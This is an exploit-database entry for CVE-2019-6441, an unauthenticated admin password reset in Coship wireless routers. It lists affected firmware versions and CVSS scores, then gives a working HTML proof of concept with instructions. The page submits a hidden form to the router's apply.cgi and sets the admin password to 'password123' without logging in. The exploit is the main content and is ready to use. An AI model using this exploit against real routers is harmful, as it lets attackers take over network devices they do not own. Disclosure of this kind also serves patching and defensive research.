Coship Wireless Router Unauthenticated Admin Password Reset

2019.01.17
Credit: Adithyan AK
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-255


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- # Exploit Title: Coship Wireless Router a Unauthenticated Admin Password Reset # Date: 15.01.2019 # Exploit Author: Adithyan AK # Vendor Homepage: http://en.coship.com/ # Category: Hardware (Wifi Router) # Affected Versions : Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49. # Tested on: MacOS Mojave v.10.14 # CVE: CVE-2019-6441 # Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html # Open Exploit.html with your Browser # Click on aSubmit requesta # Password of the admin will now be changed as "password123" # PoC : --> <html> <!-- Change the X.X.X.X with the router's IP address --> <body> <script>history.pushState('', '', '/')</script> <form action="http://X.X.X.X/apply.cgi" method="POST"> <input type="hidden" name="page" value="regx/management/accounts.asp" /> <input type="hidden" name="http_username" value="admin" /> <input type="hidden" name="http_passwd" value="password123" /> <input type="hidden" name="usr_confirm_password" value="password123" /> <input type="hidden" name="action" value="Submit" /> <input type="submit" value="Submit request" /> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top